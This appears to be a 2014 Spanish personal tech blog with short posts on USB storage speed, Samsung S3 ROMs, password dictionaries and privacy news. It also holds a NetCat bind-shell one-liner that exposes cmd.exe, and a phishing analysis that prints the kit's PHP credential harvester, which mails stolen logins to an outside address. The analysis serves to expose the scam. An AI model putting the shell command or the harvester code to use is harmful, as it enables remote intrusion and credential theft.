DEBIAN PRO

DEBIAN PRO
DEBIAN

miércoles, 20 de agosto de 2014

Almacenamiento


Hoy estuve haciendo pruebas de velocidad de I/O en dispositivos, buscaba verificar si se puede usar un teléfono como Pendrive o hay que seguir llevando un pendrive usb 3.0 porque la diferencia de velocidad es mucha.

Pendrive y teléfono SGS3 conectados a puertos USB 3.0 de un portátil
Fichero para pruebas, ISO de 886 mb
Portátil con Linux 3.13.0
SGS3 con Firmware Slim

PENDRIVE Datatravel 100 g3 - 8 GB
26 segundos para leer de Pendrive y grabarlos en un PC (dice 34 mb/s)
86 segundos leer PC y grabar en el pendrive

PENDRIVE Kingstone - 32 GB - filesystem msdos
26 segundos para leer PENDRIVE y grabar en PC
63 segundos para leer PC y grabar en pendrive (dice 17 mb/s)

Móvil SAMSUNG S3
61 segundos par leer del teléfono y grabar en el PC (dice 17 mb/s)
115 segundos para leer de PC y grabar en teléfono (dice 7.5 mb/s)

Hay pequeñas demoras desde que hago el "pegar" hasta que comienza
y otras desde que acaba hasta que cierra el diálogo de "copiando".

Todos los tiempos incluyen esas demoras.

Un punto importante es que el teléfono tiene habilitada la encriptación de la memoria, eso quiere decir que además de grabar los datos también está haciendo un proceso de CPU para encriptarlos, y eso puede estar metiendo una demora en el proceso.

Ahora tengo claro que si quiero velocidad mejor un pendrive, ya hay algunos realmente pequeños.

Un pendrive es un 57% mas rápido en Lecturas que el teléfono
y un 25% mas rápido en grabaciones.

Un teléfono sirve como almacenamiento temporal perfectamente, pero para copias donde se requiera velocidad, mejor un Pendrive.


martes, 19 de agosto de 2014

NetCat


Una herramienta que nunca hay que olvidar....

EQUIPO 1
nc –l –p 3333 –v –e cmd.exe

EQUIPO 2
telnet xx.xx.xx.xx 3333


lunes, 18 de agosto de 2014

Samsung GT-i9300 S3 roms


Durante los últimos 3 años estuve usando una ROM que me gustaba mucho, MIUI de Xiamomi, una empresa China.
Lo empecé a usar con un HTC Desire, luego un Desire Z y luego en un Samsung S3.
Tengo que reconocer que es una ROM sencila, directa, fácil de usar, con cierto parecido a un Iphone, rápida... todas ventajas.
Participé de la comunidad de MIUI en U.K. y en ES. actualizaba semanalmente la ROM con las versiones oficiales y hasta la semana pasada estaba muy contento con eso.

¿ Que pasó ?
Que XIAOMI esta sacando teléfonos nuevos, Smart T.V.s y ampliando muchisimo sus usuarios en China y en el mundo.
Algunos amigos de Madrid estan pensando comprarse un nuevo MI4 que está saliendo ahora mismo a la venta en China.
Los teléfonos que venden son mas baratos que aparatos similares de Samsung, Apple o Nokia.
Llevan una ROM basada en Android pero modificada con una interfaz simplificada y liviana.
Millones de "temas" para cambiar la parte estética del teléfono y hacerlo un poco diferente, no es útil pero es bonito y evita aburrirte con los mismos colores.
La parte estética es algo que MIUI cuidó siempre, una comunidad gigante en el mundo logra

El 8 de Agosto salió la última rom para mi teléfono (Samsung S3 gt-i9300). Y no habrá nuevas actualizaciones.
Al mirar en los foros oficiales descubro que MIUI solo dará soporte a los teléfonos que el fabricante de soporte, dicho en otras palabras....

Samsung no dará soporte ni actualizaciones de Android al S3 y Miui tampoco. Eso quiere decir que no habrá nuevas versiones oficiales MIUI y tampoco se habrá de Samsung oficialmente.

¿ Que quiere decir esto ?
Posibles problemas, vulnerabilidades, congelamiento de mejoras, etc.etc....


¿ Soluciones ?
Otras ROMs que si sigan dando soporte al Samsung S3... no es un teléfono tan viejo ni tan malo como para quitarlo.

* Slim.
Uno de los chicos del trabajo dice que va bien, así que probaré esa versión.
Ya pondré información en las próximas semanas.

* OmniRom
No tengo experiencia ni referencias.
Parece que tienen versiones Nightly y semanales, muestra que hay un seguimiento.

Cyanogen ? seguramente.

Y otros cientos de firmwares distintos.

Me parece increible que una empresa como Samsung discontinúe un modelo del vendido con dos años en el mercado, entiendo que quieran vender modelos nuevos, pero no me gusta el que tenga que cambiar un teléfono cada 2 años, sobretodo cuando es un teléfono de empresa y donde debo "justificar" que compren uno nuevo, simplemente porque el firmware no tendrá mejores ni parches.

En ese punto Xiaomi sigue dando soportes a sus teléfonos viejos, MI2 y MI3...




PARA HACER UN FLASH de la NUEVA BIOS.
Flashing SlimRoms coming from another ROM or Android version (e.g. slimbean to slimkat) (Clean flash):
- Download latest SlimRoms and latest gapps and put them on your sd card
- Boot to recovery
- In CWM, do a factory reset, wipe cache and in mounts and storage section format system
- In TWRP choose advanced in wipe section and wipe dalvik, cache, system and data
- Flash ROM
- Flash Gapps
- Reboot, setup and enjoy.

Diccionarios


No hablo de los que explican el significado de una palabra, sinó de los que tienen millones de conbinaciones de caracteres y que se usan para identificar la clave de una cuenta.
Los chicos de Dragonjar han hecho un recopilatorio bastante bueno, aún no he bajado todo porque ahora mismo no lo necesito, pero es bueno tenerlo a mano para el futuro.
EL LINK.

Snowden Y Wired


La última nota que le hicieron a Edward Snowden.
http://www.wired.com/2014/08/edward-snowden/


En el último reportaje Snowden comentó que la caída completa de Internet en Syria de hace 2 años se debía a que la NSA trataba de meter sus programitas y cometieron un error.
A esta altura de los hechos, cada caida de un sitio web hará sospechosos a los chicos de la NSA, hace tiempo Google tuvo una caida masiva, también Yahoo, Microsoft...
No quiero parecer paranoico pero pasan tantas cosas que ya veo gente mirándome en todos lados, hasta cuando duermo.

AesCrypt


Uno de los productos que están apareciendo luego del tema TrueCrypt.

miércoles, 13 de agosto de 2014

Wifi y Avast


Avast te informa que estás conectado a una red SIN CLAVE y que la NSA te puede escuchar....
Recomiendan que pagues por un servicio que ofrecen para instalarte un Proxy.
Es la primera ves que lo veo, pero me parece mucho mejor esto que no decirte nada.

Dump Your Smartphone to Protect Privacy: John McAfee

viernes, 8 de agosto de 2014

Origami y Robotica.


Como el origami, nuevos materiales y la robótica trabajan juntos.
La nueva generación de productos Skynet.

Linux en el espacio.


Esto no es nuevo, pero el post habla de que la NASA y la Agencia Espacial Europea usan Linux, diferentes colores.... pero Linux, abandonaron XP.

Defcon 21


Todas las charlas ordenadas en un solo sitio.

Ubuntu con Mir.


Algo para probar el fin de semana.
Poner a funcionar MIR en Ubuntu.

Gato, Wifi y hack.


Un proyecto "extremo" como tantos otros para hacer hacking de redes wifi...
Mezclado con el concepto de que cada ves que abres una red Wifi estas matando un gatito.

martes, 5 de agosto de 2014

Phishing...


Hoy recibí un correo de una lista a la que estoy suscripto, la redacción era bastante buena pero me llamó la atención el correo y sospeché que algo no estaba bien.
El texto del mensaje parecía correcto y traía debajo la firma correcta de quien lo enviaba.

******************************************************************
Google Drive. Mantenga todo. Compartir nada

Por favor revise el documento que he subido para ti usando a Google docs. CLICK aquí puedes firmar con tu correo electrónico para ver el documento es muy importante.
Gracias.

La Empresa
Direccion Nro
Madrid
******************************************************************





Al mirar el contenido interno del email en texto veo esto.

******************************************************************
Google Drive. Mantenga todo. Compartir nada

Por favor revise el documento que he subido para ti usando a Google docs.
CLICK aqu http :// e2elders.org / tuesday/gdocs/ puedes firmar con tu correo
electr=C3=B3nico para ver el documento es muy importante.

Gracias.
******************************************************************


Apunta a un sitio E2ELDERS.ORG..... sospechoso



Al pedir la página http://e2elders.org/tuesday/ en un navegador, me encuentro con esto.


******************************************************************
Index of /tuesday

Parent Directory
akira gdocu.zip
gdocs/

Apache Server at e2elders.org Port 80
******************************************************************



Bajo el fichero ZIP, lo abro en una carpeta local y encuentro esto.



Y al abrir el documento INDEX, veo esto....
Un sitio bastante bien hecho que puede engañar a los usuarios a que metan sus datos para ver un fichero adjunto.
Seguramente la mayoría de los navegadores y antivirus identificarán al sitio como PHISING.... pero puedeo que algunos caigan.




Al hacer CLICK en una de las imágenes, pide los datos y los enviará al email Newmanstuff@outlook.com.
Supongo que alguien del otro lado levanta los correos de ese email (Outlook) y recolecta miles de emails y passwords de sitios webs.


******************************************************************
< ? $adddate=date("D M d, Y g:i a"); $mesaegs ="php_info";$mesaegs ="@"; $ip = getenv("REMOTE_ADDR"); $mesaegs ="ymail";$mesaegs =".com"; $message .= "---------=ReZulT=---------\n"; $message .= "Online ID: ".$_POST['x0r1']."\n"; $message .= "Password: ".$_POST['x0r2']."\n"; $message .= "---------=IP Adress & Date=---------\n"; $message .= "IP Address: ".$ip."\n"; $message .= "Date: ".$adddate."\n"; $message .= "---------=by TeaserZ Wire=---------\n"; $sent ="Newmanstuff@outlook.com"; $subject = "Googledocs | hotmail"; $headers = "From: TeaserZ Wire";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
{
mail($mesaegs,$subject,$message,$headers);
mail($sent,$subject,$message,$headers);
}
header("Location: loading.htm");
? >

******************************************************************




Un mayor análisis muestra que el acceso al GMAIL se produce desde el mismo equipo pero el código se baja desde Holanda.

******************************************************************
Whois output for: wire.dan.gr
Hostname: WIRE.DAN.GR
Status: active
Registrant: micheal allen
Email: hidden (Contact the owner)
Redirects to: http://hosting7135001.az.pl/wp-rcf/sp%20pg2.html
Total hits: 6230
******************************************************************







RESUMEN DEL INCIDENTE
Te envían un email a tu cuenta gmail, con un mensaje bastante bien armado que parecía que era real indicando que accedas a ese link.
Para quien tiene algo de experiencia en temas de seguridad, jamás lo abrirías, pero miles de usuarios SI lo hacen.
Al Acceder a ese link desde un equipo sin antivirus (Avast lo detectada como phishing), se infecta tu equipo.
El troyano se inserta en el browser, corre en tu sesión con GMAIL, parte HTML y parte JavaScript
Establece una sesión contra un servidor externo desde donde baja código y otras páginas.
Lee la lista completa de contactos de Gmail y mandó 2 emails (uno a las cuentas A-L y otro M-Z), pidiendo que abran un documento de GMAIL enviando una página falsa.
En esa página falsa, mediante phishing pide que te valides, tengas cuenta en Outlook, gmail, yahoo o otros sistemas.
Al meter usuario / password, esos datos se envían por email a una cuenta de Outlook, indicando tambien IP, hora, etc.

Aunque el problema inicial es que un usuario hace CLICK en algo que no debe, el daño que genera y la cantidad de cuentas afectadas comienza a aumentar exponencialmente, tratando de infectar a todos los contactos de todos los contactos.


Mas noticias preocupantes. Cuantos equipos estarán vulnerados ?